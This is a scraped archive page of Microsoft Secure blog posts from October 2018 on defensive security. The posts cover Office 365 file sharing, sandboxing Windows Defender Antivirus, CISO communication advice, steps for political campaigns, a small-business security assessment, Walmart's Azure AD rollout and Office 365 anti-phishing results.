To classify documents using AIP, you must first configure your companys classification policy. Configure the policy by signing in to the Azure portal as an administrator and then select Azure Information Protection in the apps list. All AIP users start with a default policy that you can configure to suit your needs. Once you have created the policy that works best, publish your changes to deploy the policy to all managed apps and devices.

Use email to share files

Your employees can use email file attachments in Microsoft Outlook to share files. With Outlook, users can take files from their business or personal device, attach files to an email, and access a dedicated library where all group files are stored. If your employees need to send a sensitive message to external users, they can increase security by encrypting the message using Office 365 Message Encryption and the message recipient will decrypt the message using the Office 365 Message Encryption viewer.

Enable users to collaborate

To ensure that shared documents are only viewed by the right person, your users can share files with internal or external partners through OneDrive for Business and apply security features such as password protection and Multi-Factor Authentication.

Microsoft Teamsa chat-based workspaceenables teams to be more productive by giving them a single and secure location that brings together everything a team needs all in one hub, including chats, meetings, calls, files, and tools. Azure Active Directory (Azure AD) conditional access policies can be configured to secure the data in Teams. You can deploy Teams through Microsoft System Center Configuration Manager (ConfigMgr) or Microsoft Intune.

Yammer helps your users improve engagement with everyone in your organization through social networking. Use the security features in Yammer to help protect sensitive organizational data. Yammer supports Azure AD single sign-on authentication, allows admins to set password policies, and provides admins with session management tools that let you see the devices users are signed in to. You can manage access and permissions in Yammer by setting up the Yammer network to comply with your organizations standards.

Identify risky applications and shadow IT

Microsoft Cloud App Security allows you to more securely share documents via third-party applications by identifying the cloud apps on your network. By gaining visibility into shadow IT, you can help protect your information using policies for data sharing and data loss prevention.

How can I work on documents across devices securely?

To work more securely across different devices you will need to manage your mobile devices and set app protection policies. You can use Intune to manage your users mobile devices. To help prevent data loss, you will want to protect company data that is accessed from devices that you dont manage. You can apply Intune app protection policies that restrict access to company resources and avoid company and personal data from getting intermingled. Company data can end up in locations like personal storage or transferred to apps beyond your purview and result in data loss. App protection policies can be used to prevent company data from saving to the local storage of an unmanaged device or moving the data to other apps that aren’t protected by app protection policies.

Deployment tips from our experts

Enable security features in Office 365 appsOffice 365 apps like Outlook, OneDrive, Teams, and Yammer all come with built-in features that enable users to more securely share files and be productive. A few simple things you can do include:

Classify and share documents securelyClassify documents in AIP to track and control how information is used. Then share documents securely via third-party applications using Microsoft Cloud App Security to protect your information.

Prevent data loss on mobile devicesManage mobile devices with Intune and through mobile device management. Then implement app-level controls with Intune app protection policies to help prevent data loss.

Plan for success with Microsoft FastTrackFastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Store and share files inside and outside your organization to work securely across organizational boundaries. You can find additional security resources on

Coming Soon! Using controls for security compliance will be the last installment of our Deploying intelligent scenarios series. In November, we will kick off a new series: Top 10 security deployment actions with Microsoft 365 Security.

More blog posts from this series:

The post How to share content easily and securely appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Windows Defender Antivirus can now run in a sandbox

Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox. With this new development, Windows Defender Antivirus becomes the first complete antivirus solution to have this capability and continues to lead the industry in raising the bar for security.

Putting Windows Defender Antivirus in a restrictive process execution environment is a direct result of feedback that we received from the security industry and the research community. It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing.

While it was a tall order, we knew it was the right investment and the next step in our innovation journey. It is available to Windows Insiders today. We encourage researchers and partners to try and examine this feature and give us feedback, so we can fine-tune performance, functionality, and security before we make it broadly available.

Why sandbox? Why now?

From the beginning, we designed and built Windows Defender Antivirus to be resistant to attacks. In order to inspect the whole system for malicious content and artifacts, it runs with high privileges. This makes it a candidate for attacks.

Security researchers both inside and outside of Microsofthave previously identified ways that an attacker can take advantage of vulnerabilities in Windows Defender Antiviruss content parsers that could enable arbitrary code execution. While we havent seen attacks in-the-wild actively targeting Windows Defender Antivirus, we take these reports seriously. We immediately fixed potential problems and ramped up our own research and testing to uncover and resolve other possible issues.

At the same time, we continued hardening Windows 10 in general against attacks. Hardware-based isolation, network protection, controlled folder access, exploit protection, and other technologies reduce the attack surface and increase attacker costs. Notably, escalation of privilege from a sandbox is so much more difficult on the latest versions of Windows 10. Furthermore, the integration of Windows Defender Antivirus and other Windows security technologies into Windows Defender ATPs unified endpoint security platform allows signal-sharing and orchestration of threat detection and remediation across components.

Running Windows Defender Antivirus in a sandbox ensures that in the unlikely event of a compromise, malicious actions are limited to the isolated environment, protecting the rest of the system from harm. This is part of Microsofts continued investment to stay ahead of attackers through security innovations. Windows Defender Antivirus and the rest of the Windows Defender ATP stack now integrate with other security components of Microsoft 365 to form Microsoft Threat Protection. Its more important than ever to elevate security across the board, so this new enhancement in Windows Defender Antivirus couldnt come at a better time.

Implementing a sandbox for Windows Defender Antivirus

Modern antimalware products are required to inspect many inputs, for example, files on disk, streams of data in memory, and behavioral events in real time. Many of these capabilities require full access to the resources in question. The first major sandboxing effort was related to layering Windows Defender Antiviruss inspection capabilities into the components that absolutely must run with full privileges and the components that can be sandboxed. The goal for the sandboxed components was to ensure that they encompassed the highest risk functionality like scanning untrusted input, expanding containers, and so on. At the same time, we had to minimize the number of interactions between the two layers in order to avoid a substantial performance cost.

The ability to gradually deploy this feature was another important design goal. Because we would be enabling this on a wide range of hardware and software configurations, we aimed to have the ability at runtime to decide if and when the sandboxing is enabled. This means that the entire content scanning logic can work both in-proc and out-of-proc, and it cant make any assumptions about running with high privileges.

Performance is often the main concern raised around sandboxing, especially given that antimalware products are in many critical paths like synchronously inspecting file operations and processing and aggregating or matching large numbers of runtime events. To ensure that performance doesnt degrade, we had to minimize the number of interactions between the sandbox and the privileged process, and at the same time, only perform these interactions in key moments where their cost would not be significant, for example, when IO is being performed.

Windows Defender Antivirus makes an orchestrated effort to avoid unnecessary IO, for example, minimizing the amount of data read for every inspected file is paramount in maintaining good performance, especially on older hardware (rotational disk, remote resources). Thus, it was crucial to maintain a model where the sandbox can request data for inspection as needed, instead of passing the entire content. An important note: passing handles to the sandbox (to avoid the cost of passing the actual content) isnt an option because there are many scenarios, such as real-time inspection, AMSI, etc., where theres no sharable handle that can be used by the sandbox without granting significant privileges, which decreases the security.

Resource usage is also another problem that required significant investments: both the privileged process and the sandbox process needed to have access to signatures and other detection and remediation metadata. To avoid duplication and preserve strong security guarantees, i.e., avoid unsafe ways to share state or introducing significant runtime cost of passing data/content between the processes, we used a model where most protection data is hosted in memory-mapped files that are read-only at runtime. This means protection data can be hosted into multiple processes without any overhead.

Another significant concern around sandboxing is related to the inter-process communication mechanism to avoid potential problems like deadlocks and priority inversions. The communication should not introduce any potential bottlenecks, either by throttling the caller or by limiting the number of concurrent requests that can be processed. Moreover, the sandbox process shouldn’t trigger inspection operations by itself. All inspections should happen without triggering additional scans. This requires fully controlling the capabilities of the sandbox and ensuring that no unexpected operations can be triggered. Low-privilege AppContainers are the perfect way to implement strong guarantees because the capabilities-based model will allow fine-grained control on specifying what the sandbox process can do.

Lastly, a significant challenge from the security perspective is related to content remediation or disinfection. Given the sensitive nature of the action (it attempts to restore a binary to the original pre-infection content), we needed to ensure this happens with high privileges in order to mitigate cases in which the content process (sandbox) could be compromised and disinfection could be used to modify the detected binary in unexpected ways.

Once the sandboxing is enabled, customers will see a content process MsMpEngCP.exe running alongside with the antimalware service MsMpEng.exe.

The content processes, which run with low privileges, also aggressively leverage all available mitigation policies to reduce the attack surface. They enable and prevent runtime changes for modern exploit mitigation techniques such as Data Execution Prevention (DEP), Address space layout randomization (ASLR), and Control Flow Guard (CFG). They also disable Win32K system calls and all extensibility points, as well as enforce that only signed and trusted code is loaded. More mitigation policies will be introduced in the future, alongside other techniques that aim to reduce even further the risk of compromise, such as multiple sandbox processes with random assignment, more aggressive recycling of sandbox processes without a predictable schedule, runtime analysis of the sandbox behavior, and others.

How to enable sandboxing for Windows Defender Antivirus today

We’re in the process of gradually enabling this capability for Windows insiders and continuously analyzing feedback to refine the implementation.

Users can also force the sandboxing implementation to be enabled by setting a machine-wide environment variable (setx /M MP_FORCE_USE_SANDBOX 1) and restarting the machine. This is currently supported on Windows 10, version 1703 or later.

Looking ahead: Broader availability and continuous innovation

To implement sandboxing for Windows Defender Antivirus, we took a lot of inputs from the feedback, suggestions, and research from our peers in the industry. From the beginning, we saw this undertaking as the security industry and the research community coming together to elevate security. We now call on researchers to follow through, as we did, and give us feedback on the implementation.

Windows Defender Antivirus is on a path of continuous innovation. Our next-gen antivirus solution, which is powered by artificial intelligence and machine learning and delivered in real-time via the cloud, is affirmed by independent testers, adoption in the enterprise, and customers protected every day from malware campaigns big and small. Were excited to roll out this latest enhancement to the rest of our customers.

And we are committed to continue innovating. Were already working on new anti-tampering defenses for Windows Defender Antivirus. This will further harden our antivirus solution against adversaries. Youll hear about these new efforts soon. Windows Defender Antivirus and the rest of the Windows Defender Advanced Threat Protection will continue to advance and keep on leading the industry in raising the bar for security.



Mady Marinescu
Windows Defender Engineering team
with Eric Avena
Content Experience team



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Windows Defender Antivirus can now run in a sandbox appeared first on Microsoft Secure.

CISO series: Partnering with the C-Suite on cybersecurity

October 24th, 2018 No comments

In my last blog, we looked at five communication techniques that can help engage business managers in the work of cybersecurity. This week, well look at how to use those techniques to bring the C-Suite into the conversation.

Not too long ago, I was speaking with the CIO of a large company (some details have been changed to protect the innocent) about one of my favorite topics: how to define security policies that balance user productivity and business risk. Before long, the CIO said, Trust me, I know all about that. I stopped talking and started listening. He proceeded to tell me about an incident from a previous November. Apparently, during a small window between meetings, he decided to take advantage of the free time to do some online holiday shopping. Were all crushed for time, he knew exactly what he wanted, it took just a few minutes, and then he was off to his meeting. Only he didnt make it very far before the head of security approached to report a security policy violation. Can you believe it? The CIO said. My online shopping was flagged! I had a feeling I knew where this story was going. I got flagged for violating my own policy! he said.

The CIO then explained, It was the middle of summer, and we had just had a small security scare. At the time, the only thing I cared about was doing everything in our power to prevent a bigger incident from happening. By the time the holidays rolled around, Id forgotten all about it. To balance employee productivity, satisfaction, and corporate risk the company decided to allow access to a few selected shopping sites during November and December.

His story got me thinking. Could the company have established a more flexible policy back in the summer if the policy team had properly explained the pros and cons of the restrictive no shopping ever policy? Maybe. There is no way to know definitively. One things for sure: the experience itself clearly made an impression on the CIO. Im a big believer in learning through experience, but since we cant learn every lesson by living through it, there are opportunities to have productive conversations with executives that can increase engagement and mitigate these sorts of issues.

Five communication strategies for engaging executives and the C-Suite with security

Using the same proven communication strategies to frame up security for business managers that we shared in the last blog, Ill show how you can apply those techniques to your conversations with executives and the C-Suite. Heres a hint: it all starts with the same underlying concept. No matter how high up in the organization she or he is, or how many people or responsibilities they have, your CIO is humanand so is your entire executive team. If you apply communication strategies that have been proven to work outside of cybersecurity, you can get your CIO and other executives more involved in security decision-making.

  • FeelOne thing that my conversation with the CIO demonstrates is the role that emotions play. The original policy to lock down all ecommerce on company devices and networks was driven by fear. Emotions are understandable, but they can also drive us to make rash decisions that we regret later. You can diffuse an emotional situation by listening first. Try to understand where the CIO is coming from before you respond to his or her emotions. And above all, resist the temptation to scare an executive into taking security seriously by throwing scary statistics at them. That will only backfire.
  • FocusCIOs and other executives are bombarded with decisions and issues all day long. It can be challenging to get them to focus on your agenda, but its important if you want them to make smart security decisions. Set a meeting for a quiet period in their calendar or have a planning meeting set aside where its agreed cell phones are off and brains are fully engaged. Its amazing what we can accomplish when were not distracted.
  • Slow downThis goes hand in hand with Focus. The timing of and the amount of time for the discussion can also dictate the outcome. Allow space for questions and thoughtfulness. Ive led Executive Introduction to Threat Modeling classes using implantable medical devices (IMDs) and fitness wearables as examples. In the first five minutes most of the class leans toward thinking the IMDs pose all the risk. But once theyve taken the time to threat model both devices for themselves, they realize fitness wearables can be on-trivial threat vectors.
  • SimplifyTailor your conversation for your audience. Tech speak may resonate with a CIO, but other executives will get lost if you get too techy. And no matter who you are speaking with, its important that you speak in the language of business goals. How do your proposals and ideas best advance the goals of the executive that you are speaking with? And dont be afraid to engage the C-Suite in the activity of simplifying. If you ask the executives to think about how theyd explain ransomware or phishing to a very non-tech savvy relative, theyll be able to connect more closely with the technical risks and also, hopefully, have a bit more empathy for you, the security geek, whos tasked with explaining tough security risks to them.
  • SparkTap into the incredible power of why. Why does your company do what it does? Make sure your security pitch aligns to this overall mission. Explain how your security efforts get the company closer to achieving its vision. Go back to your corporate vision statement and ask the execs if a proposed policy or control ultimately supports that mission. When a CEO participating in an incident response simulation opts to report an incident, not because its legally required, but because our corporate values mean radical transparency with our customers, youve sparked real connection between technical risk management and the business.

Experience is one of our great teachers. As the CIO in this story learned, some security rules look good until they get in the way of executives. And some security measures may seem costly and unnecessary, but when weighed against massive reputational damage or material financial loss, those investments calibrate as frugal and wise. You don’t have to make your CIO a cyber ninja to have a productive conversation. To effect real change, engage executives as human beings in the cybersecurity policy and strategy decision-making process.

The post CISO series: Partnering with the C-Suite on cybersecurity appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Top 10 security steps in Microsoft 365 that political campaigns can take today

October 23rd, 2018 No comments

The increasing frequency of cyberattacks make clear that more must be done to protect key democratic institutions from cyber-enabled interference. Withjust a fewweeks left before theU.S.midtermelections and early voting under way,campaignsmust stay vigilant in protecting against cyberattacks to their online collaboration tools, including email.Microsoft recommendstaking action today to protect against phishing, malware,account compromise, and other threatsseeTop 10 ways to secure Office 365 and Microsoft 365 Business plans from cyberthreats.These recommendations are tailored for small to mid-sized political campaigns and election-focused stakeholders usingOffice 365or Microsoft 365. Any organizationespecially those without full-time IT security staffcan benefit fromtaking these actions.

This guidanceprovidesstep-by-step instructions forusing10 high-impact securitycapabilities.Theseactions help you implement many of the best practicesrecommended intheCybersecurity Campaign Playbook,created by the Defending Digital Democracy program at Harvard Kennedy SchoolsBelferCenter for Science and International Affairs.

Top 10cybersecurityrecommendations:

  1. Setuptwo-stepverification forall staff.
  2. Traincampaign staff to quickly identify phishing attacks.
  3. Use dedicated accountsfor administration.
  4. Raise the level of malware protection in mail.
  5. Protect against ransomware.
  6. Preventemailsauto-forwardingoutside of the campaign.
  7. Increase encryptionfor sensitive emails.
  8. Protect your email from phishing attacks.
  9. Protect against malicious attachments in email.
  10. Protect against phishing attacksthat includemalicious website links in email or other files.

Read Top 10 ways to secure Office 365 and Microsoft 365 Business plans from cyberthreatsfor details on how to implement each action.

These recommendations are provided as part of Microsofts ongoing commitment to theDefending Democracy Program. Qualifying organizations using Office 365 can also take advantage ofMicrosoftAccountGuardfor additional protectionto leverageMicrosoftsstate-of-the-artthreatdetectionand notification in case of targeted nation-state cyberattacks.

The post Top 10 security steps in Microsoft 365 that political campaigns can take today appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Take steps to secure your business and users with our security business assessment

Businesses can no longer afford to take cybersecurity for granted. You cant read the news without seeing a splashy headline about a successful hack or data breach at a well-known company. However, this isnt just a problem for large enterprisesincreasingly small and medium-sized businesses are becoming targets of cybercriminals and need to take steps to improve their security.

Yet it can be hard for small and medium-sized businesses to right size a security strategy for their unique business. We believe a good place to start is by answering these four questions:

  • How secure are your users and accounts?
  • How protected are you from threats?
  • How safe is your data?
  • How effectively are you managing security?

The Microsoft Security Assessment can help you discover where you are vulnerable and provide personalized recommendations to improve your security posture. Keep reading for a peek at some of our key learnings from the assessment.

How secure are your users and accounts?

In todays modern workplace, employees work from anywhere on any number of devices. This has been great for personal productivity, but has also created more possible points of entry for hackers to break in. One of the biggest challenges is to make it easy for your users to connect to the resources they need, from the devices they prefer, while balancing security for your company and its assets.

There are many ways to protect your accounts, but make sure you include Multi-Factor Authentication (MFA), as no password is foolproof. MFA is safer because it requires two forms of authentication to gain access. For example, you can require that users sign in with a password plus either a code generated by an application or a biometric, like fingerprints or facial recognition. Products such as Microsoft 365 Business make it easy to enable MFA for your email, file storage, and productivity apps, adding another layer of defense to your organization’s assets.

How protected are you from threats?

The latest figures show that cybercriminals are increasingly targeting small and medium-sized business alongside big businesses. Forty-one percent of businesses with fewer than 250 employees reported an attack in the last 12 months. Fortunately, there are practical things you can do to reduce your vulnerability, and every step makes a huge difference.

Two recommendations that are low cost, or even free, include maintaining software upgrade cycles and conducting regular employee training. If you dont require that employees keep software updated and patched, consider starting. Whether it is for the operating system, servers, devices, applications, plug-ins, or any other technology, updates will reduce security vulnerabilities. You can also increase your security posture through regular employee security training. The onboarding process is a good opportunity to share cybersecurity practices, but dont stop there. Consider putting a regular security training program in place to remind employees how to detect and report suspicious links, attachments, and emails; avoid malicious websites; and download only verified applications.

How safe is your data?

One of your most valuable assets is your data. Data includes everything from a private document, to personal identifiable information, to sales projections, and more. In all cases, it will be damaging to individuals and your business if it gets into the wrong hands. You need to protect sensitive data where it lives and while it travels.

One way to safeguard critical documents is with encrypted access. Document-level protection helps guarantee that only authorized users can read and inspect privileged data, even when it is sent outside of your organization. This level of protection is available in certain products, such as Microsoft 365 Business, which also includes the ability to notify and educate users when they are working with sensitive data.

How effectively are you managing security?

A strong defense is more than just a set of tools and practices. You need a thoughtful approach to how you manage security. Effective security management will give you visibility into vulnerabilities across all your resources, and it will encourage consistency across your security policies. With a strategic approach you will better understand your current risks and be able to identify opportunities to increase your protection.

A critical component of security management is periodic reviews of user access to data, devices, and networks. People, roles, and responsibilities change over time, which is why its good to know what roles have access to what resources.You can use this review to make sure that users have the right level of access, for the right time period, based on their role. For example, someone in HR might need to access the financial services database during a specific project. You can also make sure those that have left your organization or changed role have been de-provisioned, and you can investigate any suspicious activity that is detected.

Evaluate how well your businesses is protected

Unfortunately, it is not just the big brands that must combat cyberattacks. Small and medium-sized businesses are also at risk. Weve given you a sampling of our recommended security best practices, but there is still more you may want to consider. The security assessment can help you evaluate holistically how strong your current defenses are and provide specific actionable recommendations that you can put in place to increase your confidence and reduce your vulnerabilities.

Take the Microsoft Security Assessment and bookmark the Microsoft Secure blog to read up on the latest steps or deployment tips to keep your business safer.


1SMB ITDM Omnibus Survey

The post Take steps to secure your business and users with our security business assessment appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Voice of the Customer: Walmart embraces the cloud with Azure Active Directory

October 22nd, 2018 No comments

Todays post was written by Sue Bohn, partner director of Program Management and Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart.


Im Sue Bohn, partner director of Program Management at Microsoft. Im an insatiable, lifelong learner and I lead the Customer & Partner Success team for the Identity Division. Im jazzed to introduce the Voice of the Customer blog series.In this series, the best of our customers will present their deployment stories to help you learn how you can get the most out of Azure Active Directory (Azure AD).Today well hear from Walmart. I love the convenience of Walmart; where else can you buy tires, socks, and orange juice in one trip?

Walmart teamed up with Microsoft to digitally transform its operations, empower associates with easy-to-use technology, and make shopping faster and easier for millions of customers around the world. But this strategic partnership didnt just happen overnight. In the beginning, Walmarts cybersecurity team was skeptical about the security of the public cloud and Azure AD. Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart, share their teams journey working with Microsoft to embrace the cloud with Azure AD:

Working closely with our Microsoft account team convinced us we could safely write back to on-premises and enable password hash synch

In the beginning, we were willing to feed to the cloud but at that time not comfortable allowing the syncing of passwords to the cloud or write back to on-premises from cloud. We were skeptical of the security controls. We involved Microsoft in the strategy and planning phases of our initiatives and made slow but steady progress. As we worked with the Microsoft team, representatives were eager to get any and all feedback and to provide it to their product groups. This led to our critical Azure AD enhancement requests being received and solutions were delivered. When we ran into bugs, we were able to troubleshoot issues with the very people who wrote the application code. Our Microsoft account team was right there with us, in the trenches, and they were committed to making sure we were confident in Azure ADs capabilities. Over time, as we learned more about Azure AD and the new security features we were enabling, our trust in Microsofts Azure AD security capabilities grew and many of our security concerns were alleviated.

Given our scale, validating and verifying the security capabilities of Azure AD was key to empowering our users while still protecting the enterprise. Walmart currently has over 2.5 million Azure AD users enrolled, and with that many users we need very granular controls to adequately protect our assets. The entire team, including Microsoft, rolled up our sleeves to figure out how to make it work, and together weve enabled several features that let us apply custom security policies. Azure Information Protection (AIP), an amazing solution that is only possible with Azure AD, allows us to classify and label documents and emails to better protect our data. Azure AD Privileged Identity Management (PIM) gives us more visibility and control over admins. Azure AD dynamic groups lets us automatically enable app access to our users. This is a huge time saver in an environment with over half a million groups. With all of the work we did with Microsoft and our internal security team, we were able to turn on the two features we previously did not think we would be able topassword hash synch and write back from cloud to on-premises. This was critical to our journey as we had never allowed a cloud solution to feed back into our core environment in this manner.

Driving down help desk calls with self-service password reset

One example that shows how much we trust the security of Azure AD and the cloud is self-service password reset (SSPR). The biggest driver of help desk calls at Walmart is people who get locked out of their accounts because of a forgotten password. It wastes a tremendous amount of our help desks time and frustrates associates who lose time sitting on the phone. We believed that letting users reset their passwords and unlock their accounts without help desk involvement would go a long way and improve productivity, but we had always been nervous about giving people who werent on Walmart PCs that kind of access. Another hurdle was ensuring that our hourly associates were only able to utilize this service while they were clocked in for work. Microsoft helped us solve this with the implementation of custom controls.

Our Microsoft team supported us the entire way, and were proud to say that SSPR is being rolled out. When we started this journey, we would never have believed that we would allow people to reset their passwords from a public interface, but here we are, and the user experience is great!

Engage Microsoft early

If there is one thing we would have done differently, it would be to engage Microsoft at a deeper level earlier on in the process. Our public cloud adoption didnt really take off until we brought them in and spent time with their backend product engineering teams. Microsofts commitment to improving security and the cloud is clear. Their work to safeguard data has continuously improved, and while we work closer with them, they also continue to incorporate our feedback into future feature releases. It is the relationship that has allowed us to securely implement Azure AD at our scale.

We look forward to sharing our next big success: implementation of Azure AD B2B.

Voice of the Customer: looking ahead

Many thanks to Ben and Gerald for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers security and implementation insights more broadly. Bookmark the Microsoft Secure blog so you dont miss part 2 in this series. Our next customer will speak to how Azure AD and implementing cloud Identity and Access Management makes them more secure.

The post Voice of the Customer: Walmart embraces the cloud with Azure Active Directory appeared first on Microsoft Secure.

Categories: Cloud Computing, cybersecurity Tags:

CISO series: Building a security-minded culture starts with talking to business managers

October 18th, 2018 No comments

Cybersecurity is everyones business; protecting the company and its users against data leaks is no longer just the responsibility of IT and security operations. Everyone from the board to Firstline Workers has an important role to play. A culture that encourages individuals to believe they have a part in defending the company against malicious behavior requires that each person is aware of the day-to-day risks and knows how their actions and choices can mitigate, or increase, those risks. This is why we will be writing a new series of blog posts for senior security experts and executives called the CISO series to help further discussions from within the organization to the boardroom to the customer and help establish that security culture and mindset.

If you are like many of your peers, one of the initiatives that youve put in place to create a culture where everyone in your organization takes security seriously is a required, annual security training for all employees. And, hopefully, it seems to be working. Feedback from security training indicates that employees have a better understanding of their role in cybersecurity. Even more important, many of your users have begun to take steps to improve their security posture, such as by reporting suspicious emails rather than clicking the links.

There’s just one problem. Today, one of your security operations managers brings to your attention a report showing that the sales division consistently gets low scores on the training. The sales team promotes your business products throughout the worldin Asia, Europe, North America, and South Americaoften accessing company data from overseas via unsecured wireless. If anyone needs to ace this training, its this team. Youre tempted to get on the phone immediately and provide the VP of Sales a litany of scary statistics that prove how critical this training is. But, fortunately, you stop yourself. If you have any hope of increasing compliance, you need this manager engaged in the solution and on your side. Whats more, if you handle the discussion properly, the VP of Sales could give you insights to help you craft a program that his team will embrace more enthusiastically.

Turn business managers into security evangelists

If you have any hope of turning the VP of Sales into an advocate you need to frame security in the language of the business by quantifying business impacts. Youve heard this before, but what does it mean in practice? What if we start with an even more basic truth: The most important thing to remember about the VP of Sales is that he/she is a human being. And so is everyone on the team. In other words, tried and true communication strategies that have been proven to work outside of cybersecurity also work with humans who happen to be business managers.

Five communication strategies proven to work

Take a look at the following communication strategies and see how they can be customized for your conversation with your own VP of Sales:

  • FeelYou probably have a list of statistics that could scare the VP of Sales into compliance, but they also might backfire, causing them to shut down. A more effective approach is to dial down the emotional undercurrent of the conversation and start by listening. You may think you know why the sales team has low training compliance, then again, maybe you dont. The very first step is understanding their side. Dont move on to solutions until you both are confident that you understand why the team has not prioritized the training.
  • FocusEveryone is trying to do 10 things at once, but continuous partial attention means we cant focus on whats important. Once you understand why the sales team has not been scoring high marks on the training, you can engage the business manager (VP of Sales) in a conversation that is laser-focused on their team needs, making it more likely that you both will put your full attention on the issue.
  • Slow downTime limits make us think less strategically. If you need time to gather the data that will support your case, consider calling for a pause, so you can do your due diligence. And make sure you time your conversation with the VP during a quiet time in the quarter. Year end is a hectic time for sales, and the worst time to try and squeeze in a cyber awareness discussion.
  • SimplifyRemember that tech speak is not the right language for this audience. Give some thought to how your security training supports the goals of the sales team. Access to reliable customer data like escalations and licenses is critical to a successful mobile data force. Cybersecurity is about ensuring the sales team has confidential access to that data wherever and whenever they need it. The VP will more likely understand your priorities if they understand how theyre aligned to their priorities.
  • SparkTap into the incredible power of why by explaining why your company needs security compliance. Make sure your security pitch and training align to this overall mission. Explain how your security efforts get the company closer to achieving its vision.

Creating a culture where everyone takes accountability for defending the enterprise against cybercrime will require that we get everyone engaged from the board and C-Suite executive to business managers and Firstline Workers. As you embark on this effort, keep in mind that how you say it is as important as what you say. You can create a path to success if you understand the motivations and goals of the business, and if you dont forget one core truth: Were all human. Please stay tuned for our next blog in this series where I will give you tips for engaging your C-Suite executive team in the cybersecurity conversation.

The post CISO series: Building a security-minded culture starts with talking to business managers appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

How Office 365 learned to reel in phish

October 17th, 2018 No comments

Today’s post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Jason Rogers, Principal Group Program Manager at Microsoft.

We recently reported how we measure catch rates of malicious emails for Office 365 Exchange Online Protection (EOP) (available with any Office 365 subscription) and Advanced Threat Protection (ATP) (available as a standalone service or with Office 365 E5).

Today, we’re sharing the results from the enhancements we made to anti-phish capabilities for Office 365 to address impersonation, spoof, and phish content and internal phish emails sent from compromised accounts. Over the last year, Microsofts threat analysts discovered threat actors pivoting from malware to sophisticated, often targeted phishing campaigns. The scale of these attacks and how quickly users click through on malicious links is shown in Figure 1.

Figure 1. Phish email statistics from Office 365 from January 2018 to September 2018.

Understanding the phish landscape

To develop solutions mitigating these modern phishing campaigns, our engineers rigorously analyzed phish emails in Office 365, uncovering a general pattern of phish campaigns following the path shown in Figure 2.

Figure 2. Phish email campaign pathway from initial reconnaissance to data exfiltration.

Additionally, since Office 365 is one of the worlds largest email service providers, Microsoft gains visibility and experience across mostif not alltypes of cyber threats. Every day, Microsoft analyzes 6.5 trillion signals, and each month we analyze 400 billion emails, while detonating 1 billion items in our sandbox. This telemetry helps us understand the full spectrum of phish attacks and the sophisticated and varied methods used by attackers, summarized in Figure 3. With this understanding of the phish landscape, our engineers not only designed new capabilities, but also enhanced existing capabilities to address the phishing emails being launched at customers.

Figure 3. Phish emails attack spectrum and variety of attack methods.

Understanding the situation

When we began our journey of enhancing our anti-phish capabilities, we admittedly were not best of breed at mitigating phish. As we alluded to previously, transparency with customers is a core priority at Microsoft. Figure 4 shows the number of phish emails that Microsoft (Office 365) missed in comparison to several other vendors also protecting email for customers within Office 365.

From November 2017 to January 2018, you see that Office 365 (orange bar in Figure 4) was not the best solution at phish catch. (We previously discussed how we measure phish catch.) The values are based on normalized email volume. As the inset plot shows, the scale of mail volume in Office 365 far exceeds the mail volume of third-party vendors. Fundamentally, this scale is one our differentiators and strengths as it offers us much greater depth and breadth into the threat landscape.

Figure 4. Normalized phish email miss from November 2017 to January 2018 in Office 365 email traffic. Inset shows actual mail flow volume.

Solving the problem with our technology, operations, and partnerships

Leveraging our signal from mail flow, the expertise of 3,500 in-house security professionals, and our annual $1 billion investment in cybersecurity, we strategically addressed the growing wave of phishing campaigns. Our engineers determined four categories of phish emails and designed capabilities addressing each type. Figure 5 summarizes the enhancements made to the anti-phish capabilities in Office 365.

Figure 5. Phish email categories and anti-phish enhancements made in Office 365 to address the categories.

Details on all the anti-phish updates for Office 365 are available in the following posts:

While the enhancements are interesting, ultimately, catch rate is the parameter that counts, and it is important to remember that no solution can ever stop all threats. Sometimes misses occur, and the most effective solution will miss the least. To this end, we are very excited to share our phish miss rate from May 1, 2018 to September 16, 2018. As you can see in Figure 6, today, when compared to the same set of vendors that we compared ourselves to in November to January, we exhibit the lowest miss rate of phish emails in Office 365. Figure 6 is the culmination of the incredible focus, drive, and expertise of Microsoft researchers and engineers working together to push the boundaries of threat research, machine learning, and development of algorithms that together provide customers the most impressive and effective protection against phish emails available for Office 365 today.

Figure 6. Normalized Phish Email Miss Rate in Office 365 from May 1, 2018 to September 16, 2018. Inset is a blowup of the graph from August 1, 2018 to September 16, 2018.

While the graph in Figure 6 is illuminating, we also want to share statistics from Office 365 EOP/ATP related to phish mitigation. Figure 7 is a summary of the remarkable impact these powerful new anti-phish capabilities across EOP/ATP have had with helping secure Office 365 users, and further showcases our tremendous depth and scale into the threat landscape. For those unfamiliar with Office 365 ATP, Safe Links provides time of click protection from malicious links in email where the click triggers several different protection technologies, including URL reputation checks, machine learning capabilities, and link detonation as needed. Recently, Safe Links expanded its capabilities to intra-org emails, making Office 365 ATP the only service to offer this type of protection while ensuring the internal emails remain within the compliance boundary of Office 365. We hope you agree at that the anti-phish capabilities have evolved at a remarkable pace and with amazing results.

Figure 7. The impact to end users from the enhanced anti-phish capabilities in Office 365.

Learn more

We hope this post provides a good overview on how we are helping customers with modern phishing campaigns. Please be sure to check out the Ignite session, Secure enterprise productivity with Office 365 threat protection services including EOP, ATP, and Threat Intelligence, where we give more details. Your feedback enables us to continue improving and adding features that will continue to make ATP the premiere advanced security service for Office 365. If you have not tried Office 365 ATP for your organization yet, you should begin a free Office 365 E5 trial today and start securing your organization from the modern threat landscape.

The post How Office 365 learned to reel in phish appeared first on Microsoft Secure.

Categories: cybersecurity Tags: